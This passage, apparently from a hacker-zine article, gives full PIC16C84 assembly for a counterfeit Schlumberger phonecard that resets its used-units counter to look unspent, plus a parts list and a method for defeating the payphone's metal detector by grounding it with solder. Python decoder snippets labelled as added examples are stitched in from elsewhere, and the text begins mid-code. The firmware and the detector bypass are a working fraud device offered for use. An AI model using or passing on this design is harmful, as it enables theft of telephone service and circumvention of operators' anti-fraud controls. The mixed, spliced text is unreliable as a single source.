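                          + [0xFF, 0xFF, 0x80] + [0x00] * 16 + [0xFF])
SAMPLE_ODS_BEFORE = bytes([0x00, 0x2F] + [0x00] * 6 + [0, 0, 0, 0x01, 0x04] + [0xFF] * 3)
SAMPLE_ODS_AFTER = bytes([0x00, 0x2F] + [0x00] * 6 + [0, 0, 0, 0x01, 0x00] + [0xFF] * 3)
SAMPLE_ODS_REFILLED = bytes([0x00, 0x2F] + [0x00] * 6 + [0, 0, 0, 0x01, 0x07] + [0xFF] * 3)

if __name__ == "__main__":
    print(decode_256(SAMPLE_SWEDEN_50))
    print(decode_256(SAMPLE_FRANCE_120))
    print(decode_128(SAMPLE_ODS_BEFORE))
    print(counter_only_decreases(SAMPLE_ODS_BEFORE, SAMPLE_ODS_AFTER))
    print(counter_only_decreases(SAMPLE_ODS_BEFORE, SAMPLE_ODS_REFILLED))
```

The French card sample has 17 bits burnt, ten of which the table says are factory test units, so 7 of its 120 units are gone; the Swedish sample has 12 burnt with 2 test bits, leaving 40 of 50. The last two calls show the point of the check: a dump whose counter went from 12 to 8 is consistent, one whose counter went from 12 to 15 is not.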
Let's have a look at the PIC Software! (Note that the current version of Microchip's PICSTART 16B package is unable to program the DATA EEPROM array in the 16C84, so if you are going to use that one, use the other version of the source code which you'll find in the UUEncoded part!).

<Start of TELECARD.ASM>.
==============================================================================
        TITLE   "ISO 7816 Synchronous Memory Card Emulator"
        LIST    P=PIC16C84, R=HEX
        INCLUDE "PICREG.EQU"

; PIC16C84 I/O Pin Assignment List

CRD_CLK equ     0               ; RB0 + RA4 = Card Clock
CRD_DTA equ     0               ; RA0 = Card Data Output
CRD_RST equ     1               ; RB1 = Card Reset, Low-Active
CRD_WE  equ     7               ; RB7 = Card Write-Enable, Hi-Active

; PIC16C84 RAM Register Assignments

CRD_ID  equ     0x00c           ; Smartcard ID, 12 bytes
FUSCNT  equ     0x018           ; Fused units counter
BITCNT  equ     0x019           ; Bitcounter
LOOPCNT equ     0x01a           ; Loop Counter
EE_FLAG equ     0x01b           ; EEPROM Write Flag
TEMP1   equ     0x01c           ; Temporary Storage #1
TEMP2   equ     0x01d           ; Temporary Storage #2
TEMP3   equ     0x01e           ; Temporary Storage #3
TEMP4   equ     0x01f           ; Temporary Storage #4
TEMP_W  equ     0x02e           ; Temporary W Save Address
TEMP_S  equ     0x02f           ; Temporary STATUS Save Address

        org     0x2000          ; Chip ID Data
        dw      042,042,042,042

        org     0x2007          ; Configuration Fuses
        dw      B'00000001'

        org     0x2100          ; Internal Data EEPROM Memory (Card ID!!!)
        db      0x081,0x042,0x000,0x011,0x022,0x033
        db      0x044,0x055,0x066,0x077,0x011,0x084
        db      0x002           ; Default used up credits value

        org     PIC84           ; Reset-vector
        goto    INIT            ; Jump to initialization routine

        org     INTVEC          ; Interrupt-vector
        push                    ; Save registers
        call    INTMAIN         ; Call main interrupt routine
        pop                     ; Restore registers
        retfie                  ; return from interrupt & clear flag

        org     0x010           ; Start address for init rout.

INIT    bsf     STATUS,RP0      ; Access register bank 1
        clrwdt                  ; Clear watchdog timer
        movlw   B'11101000'     ; OPTION reg. settings
        movwf   OPTION          ; Store in OPTION register
        movlw   B'11111110'     ; Set PORT A Tristate Latches
        movwf   TRISA           ; Store in PORT A tristate register
        movlw   B'11111111'     ; Set PORT B Tristate Latches
        movwf   TRISB           ; Store in PORT B tristate register
        bcf     STATUS,RP0      ; Access register bank 0
        clrf    RTCC            ; Clear RTCC
        clrf    PORTA           ; Clear PORTA
        clrf    PORTB           ; Clear PORTB
        movlw   0d              ; 13 bytes to copy
        movwf   LOOPCNT         ; Store in LOOPCNT
        movlw   0c              ; Start storing at $0c in RAM
        movwf   FSR             ; Store in FSR
        clrf    EEADR           ; Start at EEPROM Address 0

EECOPY  bsf     STATUS,RP0      ; Access register bank 1
        bsf     EECON1,RD       ; Set EECON1 Read Data Flag
        bcf     STATUS,RP0      ; Access register bank 0
        movfw   EEDATA          ; Read one byte of EEPROM Data
        movwf   INDIR           ; Store in RAM pointed at by FSR
        incf    FSR             ; Increase FSR pointer
        incf    EEADR           ; Increase EEPROM Address Pointer
        decfsz  LOOPCNT,1       ; Decrease LOOPCNT until it's 0
        goto    EECOPY          ; Go and get some more bytes!

        bsf     STATUS,RP0      ; Access register bank 1
        bcf     EECON1,EEIF     ; Clear EEPROM Write Int. Flag
        bcf     EECON1,WREN     ; EEPROM Write Disable
        bcf     STATUS,RP0      ; Access register bank 0
        movlw   B'10010000'     ; Enable INT Interrupt
        movwf   INTCON          ; Store in INTCON

MAIN    bsf     STATUS,RP0      ; Access register bank 1
        btfsc   EECON1,WR       ; Check if EEPROM Write Flag Set
        goto    MAIN            ; Skip if EEPROM Write is Completed
        bcf     EECON1,EEIF     ; Reset Write Completion Flag
        bcf     EECON1,WREN     ; EEPROM Write Disable
        bcf     STATUS,RP0      ; Access register bank 0
        btfss   EE_FLAG,LSB     ; Check for EEPROM Write Flag
        goto    MAIN            ; If not set, jump back and wait some more
        clrf    EE_FLAG         ; Clear EEPROM Write Flag
        movlw   0c              ; Units is stored in byte $0c
        movwf   EEADR           ; Store in EEPROM Address Counter
        movfw   FUSCNT          ; Get fused units counter
        movwf   EEDATA          ; Store in EEDATA
        bsf     STATUS,RP0      ; Access register bank 1
        bsf     EECON1,WREN     ; EEPROM Write Enable
        bcf     INTCON,GIE      ; Disable all interrupts
        movlw   055             ; Magic Number #1 for EEPROM Write
        movwf   EECON2          ; Store in EECON2
        movlw   0aa             ; Magic Number #2 for EEPROM Write
        movwf   EECON2          ; Store in EECON2
        bsf     EECON1,WR       ; Execute EEPROM Write
        bsf     INTCON,GIE      ; Enable all interrupts again!
        bcf     STATUS,RP0      ; Access register bank 0
        goto    MAIN            ; Program main loop!

INTMAIN btfsc   INTCON,INTF     ; Check for INT Interrupt
        goto    INTMAIN2        ; If set, jump to INTMAIN2
        movlw   B'00010000'     ; Enable INT Interrupt
        movwf   INTCON          ; Store in INTCON
        return

INTMAIN2 bcf    STATUS,RP0      ; Access register bank 0
        bsf     PORTA,CRD_DTA   ; Set Data Output High
        btfsc   PORTB,CRD_RST   ; Check if reset is low
        goto    NO_RST          ; If not, skip reset sequence
        movfw   RTCC            ; Get RTCC Value
        movwf   TEMP4           ; Store in TEMP4
        clrf    RTCC            ; Clear RTCC
        movlw   055             ; Subtract $55 from TEMP4
        subwf   TEMP4,0         ; to check for card reset....
        bnz     NO_RST2         ; If not zero, jump to NO_RST2
        movlw   02              ; Unused one has $02 in FUSCNT
        movwf   FUSCNT          ; Store full value in FUSCNT
        bsf     EE_FLAG,LSB     ; Set EEPROM Write Flag
NO_RST2 bcf     INTCON,INTF     ; Clear INT Interrupt Flag
        return                  ; Mission Accomplished, return to sender

NO_RST  movfw   RTCC            ; Get RTCC Value
        movwf   BITCNT          ; Copy it to BITCNT
        movwf   TEMP1           ; Copy it to TEMP1
        movwf   TEMP2           ; Copy it to TEMP2
        movlw   060             ; Load W with $60
        subwf   TEMP1,0         ; Subtract $60 from TEMP1
        bz      CREDIT          ; If it is equal to $60
        bc      CREDIT          ; or greater, then skip to units area
        rrf     TEMP2           ; Rotate TEMP2 one step right
        rrf     TEMP2           ; Rotate TEMP2 one step right
        rrf     TEMP2           ; Rotate TEMP2 one step right
        movlw   0f              ; Load W with $f
        andwf   TEMP2,1         ; And TEMP2 with W register
        movfw   TEMP2           ; Load W with TEMP2
        addlw   0c              ; Add W with $0c
        movwf   FSR             ; Store data address in FSR
        movfw   INDIR           ; Get databyte pointed at by FSR
        movwf   TEMP3           ; Store it in TEMP3
        movlw   07              ; Load W with $07
        andwf   TEMP1,1         ; And TEMP1 with $07
        bz      NO_ROT          ; If result is zero, skip shift loop
ROTLOOP rlf     TEMP3           ; Shift TEMP3 one step left
        decfsz  TEMP1,1         ; Decrement TEMP1 until zero
        goto    ROTLOOP         ; If not zero, repeat until it is!
NO_ROT  btfss   TEMP3,MSB       ; Check if MSB of TEMP3 is set
        bcf     PORTA,CRD_DTA   ; Clear Data Output
        bcf     INTCON,INTF     ; Clear INT Interrupt Flag
        return                  ; Mission Accomplished, return to sender

CREDIT  btfss   PORTB,CRD_WE    ; Check if Card Write Enable is High
        goto    NO_WRT          ; Abort write operation if not...
        btfss   PORTB,CRD_RST   ; Check if Card Reset is High
        goto    NO_WRT          ; Abort write operation if not...
        incf    FUSCNT          ; Increase used-up units counter
        bsf     EE_FLAG,LSB     ; Set EEPROM Write-Flag
        bcf     INTCON,INTF     ; Clear INT Interrupt Flag
        return                  ; Mission Accomplished, return to sender

NO_WRT  movlw   060             ; Load W with $60
        subwf   BITCNT,1        ; Subtract $60 from BITCNT
        movfw   FUSCNT          ; Load W with FUSCNT
        subwf   BITCNT,1        ; Subtract FUSCNT from BITCNT
        bnc     FUSED           ; If result is negative, unit is fused
        bcf     PORTA,CRD_DTA   ; Clear Data Output
FUSED   bcf     INTCON,INTF     ; Clear INT Interrupt Flag
        return                  ; Mission Accomplished, return to sender

        END
==============================================================================
<End of TELECARD.ASM>.

<Start of PICREG.EQU>.
==============================================================================
; PIC16Cxx Microcontroller Include File

PIC54   equ     0x1ff           ; PIC16C54 Reset Vector
PIC55   equ     0x1ff           ; PIC16C55 Reset Vector
PIC56   equ     0x3ff           ; PIC16C56 Reset Vector
PIC57   equ     0x7ff           ; PIC16C57 Reset Vector
PIC71   equ     0x000           ; PIC16C71 Reset Vector
PIC84   equ     0x000           ; PIC16C84 Reset Vector
INTVEC  equ     0x004           ; PIC16C71/84 Interrupt Vector

INDIR   equ     0x000           ; Indirect File Reg Address Register
RTCC    equ     0x001           ; Real Time Clock Counter
PCL     equ     0x002           ; Program Counter Low Byte
STATUS  equ     0x003           ; Status Register
FSR     equ     0x004           ; File Select Register
PORTA   equ     0x005           ; Port A I/O Register
PORTB   equ     0x006           ; Port B I/O Register
PORTC   equ     0x007           ; Port C I/O Register
ADCON0  equ     0x008           ; PIC16C71 A/D Control Reg 0
ADRES   equ     0x009           ; PIC16C71 A/D Converter Result Register
EEDATA  equ     0x008           ; PIC16C84 EEPROM Data Register
EEADR   equ     0x009           ; PIC16C84 EEPROM Address Register
PCLATH  equ     0x00a           ; Program Counter High Bits
INTCON  equ     0x00b           ; Interrupt Control Register
TRISA   equ     0x005           ; Port A I/O Direction Register
TRISB   equ     0x006           ; Port B I/O Direction Register
TRISC   equ     0x007           ; Port C I/O Direction Register
ADCON1  equ     0x008           ; PIC16C71 A/D Control Reg 1
EECON1  equ     0x008           ; PIC16C84 EEPROM Control Reg. 1
EECON2  equ     0x009           ; PIC16C84 EEPROM Control Reg. 2
OPTION  equ     0x001           ; Option Register

MSB     equ     0x007           ; Most-Significant Bit
LSB     equ     0x000           ; Least-Significant Bit
TRUE    equ     1
YES     equ     1
FALSE   equ     0
NO      equ     0

; Status Register (f03) Bits

CARRY   equ     0x000           ; Carry Bit
C       equ     0x000           ; Carry Bit
DCARRY  equ     0x001           ; Digit Carry Bit
DC      equ     0x001           ; Digit Carry Bit
Z_BIT   equ     0x002           ; Zero Bit
Z       equ     0x002           ; Zero Bit
P_DOWN  equ     0x003           ; Power Down Bit
PD      equ     0x003           ; Power Down Bit
T_OUT   equ     0x004           ; Watchdog Time-Out Bit
TO      equ     0x004           ; Watchdog Time-Out Bit
RP0     equ     0x005           ; Register Page Select 0
RP1     equ     0x006           ; Register Page Select 1
IRP     equ     0x007           ; Indirect Addressing Reg. Page Sel.

; INTCON Register (f0b) Bits

RBIF    equ     0x000           ; RB Port change interrupt flag
INTF    equ     0x001           ; INT Interrupt Flag
RTIF    equ     0x002           ; RTCC Overflow Interrupt Flag
RBIE    equ     0x003           ; RB Port Ch. Interrupt Enable
INTE    equ     0x004           ; INT Interrupt Enable
RTIE    equ     0x005           ; RTCC Overflow Int. Enable
ADIE    equ     0x006           ; PIC16C71 A/D Int. Enable
EEIE    equ     0x006           ; PIC16C84 EEPROM Write Int. Enable
GIE     equ     0x007           ; Global Interrupt Enable

; OPTION Register (f81) Bits

PS0     equ     0x000           ; Prescaler Bit 0
PS1     equ     0x001           ; Prescaler Bit 1
PS2     equ     0x002           ; Prescaler Bit 2
PSA     equ     0x003           ; Prescaler Assignment Bit
RTE     equ     0x004           ; RTCC Signal Edge Select
RTS     equ     0x005           ; RTCC Signal Source Select
INTEDG  equ     0x006           ; Interrupt Edge Select
RBPU    equ     0x007           ; Port B Pull-up Enable

; ADCON0 Register (f08) Bits

ADON    equ     0x000           ; A/D Converter Power Switch
ADIF    equ     0x001           ; A/D Conversion Interrupt Flag
ADGO    equ     0x002           ; A/D Conversion Start Flag
CHS0    equ     0x003           ; A/D Converter Channel Select 0
CHS1    equ     0x004           ; A/D Converter Channel Select 1
ADCS0   equ     0x006           ; A/D Conversion Clock Select 0
ADCS1   equ     0x007           ; A/D Conversion Clock Select 1

; ADCON1 Register (f88) Bits

PCFG0   equ     0x000           ; RA0-RA3 Configuration Bit 0
PCFG1   equ     0x001           ; RA0-RA3 Configuration Bit 1

; EECON1 Register (f88) Bits

RD      equ     0x000           ; PIC16C84 EEPROM Read Data Flag
WR      equ     0x001           ; PIC16C84 EEPROM Write Data Flag
WREN    equ     0x002           ; PIC16C84 EEPROM Write Enable Flag
WRERR   equ     0x003           ; PIC16C84 EEPROM Write Error Flag
EEIF    equ     0x004           ; PIC16C84 EEPROM Interrupt Flag

; Some useful macros...

PUSH    macro
        movwf   TEMP_W
        swapf   STATUS,W
        movwf   TEMP_S
        endm

POP     macro
        swapf   TEMP_S,W
        movwf   STATUS
        swapf   TEMP_W
        swapf   TEMP_W,W
        endm

        END
==============================================================================
<End of PICREG.EQU>.

The Security System:
~~~~~~~~~~~~~~~~~~~~
The security of the Schlumberger card system depends strongly on two things. The first is the metal detector in the card reader, which senses whether there is any metal on the card where there shouldn't be any.
Circuit traces on a home-built card are definitely made of metal. So, we have to figure out a way of getting around this problem... Well, that isn't really too hard! They made one really big mistake: if the metal detector is grounded, it doesn't work!! If you look at the printout of my layouts for this card you'll find one big rectangle-shaped area of the board. In this area you should make a big blob of solder that is between 2 and 3 millimetres high (approximately!). When the card slides into the phone, the blob should be touching the metal detector, and since the blob is connected to ground the detector is also being grounded.

The fone also counts the number of times the metal detector gets triggered by foreign objects in the card reader (meaning that the phone company's security staff can see if someone is attempting to use a fake card that doesn't have this counter-measure on it!), and this count is of course included in the daily service report the fone sends to the central computer.

The second security measure lies in the card's first 12 bytes. They are not just what they appear to be, a serial number; they are more than that. Part of the first byte is a checksum of the number of 1's in the 11 bytes following it. Then byte 2 is always $83, identifying the card as an electronic phonecard. Bytes 3 and 4 are the number of units on the card: the first nibble of byte 3 is always $1, and then in the remaining three nibbles the number of units is stored in BCD code; for example $11,$22 means 120 units (two units are always fused at the factory as a test, see the text by Stephane Bausson!). Then we have 4 bytes of card serial number data, 2 bytes of card checksum (calculated with a 16-bit key stored in the payfone ROM), 1 byte that is always $11, and then at last byte 12, which is the country identifier.
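As an added example (not from the original phile), here is a small Python decoder that applies the header layout just described to a 12-byte header and rejects anything that breaks the fixed-byte and BCD rules, which is the sanity check a reader or fraud analyst would want before trusting what a card reports. The sample header and its serial, checksum and country values are constructed; the partial checksum in byte 1 and the keyed 16-bit checksum in bytes 9 and 10 cannot be verified from what the page states, so they are only reported, and the unit count follows the page's reading that $11,$22 stands for 120 usable units once the two factory test units are subtracted.

```python
"""Decoder for the 12-byte card header layout described above (added example)."""
from dataclasses import dataclass

CARD_TYPE_ID = 0x83        # byte 2 of every electronic phonecard
FACTORY_TEST_UNITS = 2     # two units are fused at the factory as a test
FIXED_BYTE_11 = 0x11       # byte 11 is always $11
UNITS_HIGH_NIBBLE = 0x1    # high nibble of byte 3 is always $1

@dataclass(frozen=True)
class CardHeader:
    ones_in_tail: int     # number of 1 bits in bytes 2..12 (byte 1 partly encodes it)
    nominal_units: int    # BCD value as written, e.g. $11,$22 -> 122
    usable_units: int     # nominal minus the factory test units, e.g. 120
    serial: bytes         # bytes 5..8
    checksum: bytes       # bytes 9..10, keyed with a 16-bit key in payphone ROM (not checked)
    country: int          # byte 12

def _bcd(nibble: int, where: str) -> int:
    if nibble > 9:
        raise ValueError(f"non-BCD nibble {nibble:#x} in {where}")
    return nibble

def decode_header(raw: bytes) -> CardHeader:
    """Parse and sanity-check one header; raises ValueError on malformed input."""
    if len(raw) != 12:
        raise ValueError(f"expected 12 header bytes, got {len(raw)}")
    if raw[1] != CARD_TYPE_ID:
        raise ValueError(f"byte 2 is {raw[1]:#04x}, not the phonecard id 0x83")
    if raw[2] >> 4 != UNITS_HIGH_NIBBLE:
        raise ValueError(f"high nibble of byte 3 is {raw[2] >> 4:#x}, expected 0x1")
    if raw[10] != FIXED_BYTE_11:
        raise ValueError(f"byte 11 is {raw[10]:#04x}, expected 0x11")
    nominal = (_bcd(raw[2] & 0xF, "byte 3") * 100
               + _bcd(raw[3] >> 4, "byte 4 high") * 10
               + _bcd(raw[3] & 0xF, "byte 4 low"))
    return CardHeader(
        ones_in_tail=sum(bin(b).count("1") for b in raw[1:]),
        nominal_units=nominal,
        usable_units=nominal - FACTORY_TEST_UNITS,
        serial=bytes(raw[4:8]),
        checksum=bytes(raw[8:10]),
        country=raw[11],
    )

# Constructed sample (not a real card): byte 1 left 0x00, dummy serial/checksum/country.
SAMPLE_HEADER = bytes.fromhex("00 83 11 22 01 02 03 04 aa bb 11 46")
```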
The Parts Needed:
~~~~~~~~~~~~~~~~~
01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package)
01 * 4 MHz Ceramic Resonator, Surface Mounted
02 * 22 pF Capacitors, Surface Mounted (Size 1206)
01 * 0.8 mm thick single-sided circuit board with P20 photoresist

The Construction:
~~~~~~~~~~~~~~~~~
Since this project is obviously not intended for the novice in electronics, I will not go into the basic details of soldering/etching circuit boards. If you do not know much about this, ask a friend who does for help. If you want to reach me for help, write to Phrack and ask them to forward the letter to me, as I wish to remain anonymous. This project will probably upset a lot of phone companies and, last but not least, the guys at Schlumberger Tech.

The UUEncoded Part:
~~~~~~~~~~~~~~~~~~~
In this part of the phile you will find circuit board layouts for Tango PCB as well as HP LaserJet binary files which will output the layout when printed from DOS with the PRINT command. You will also find another version of the source code to use if your PIC prommer can't handle the programming of the 64-byte Data EEPROM array.

<UUEncoded Part Begins Here>.
------------------------------------------------------------------------------
section 1 of uuencode 5.22 of file telecard.zip by R.E.M.
begin 644 telecard.zip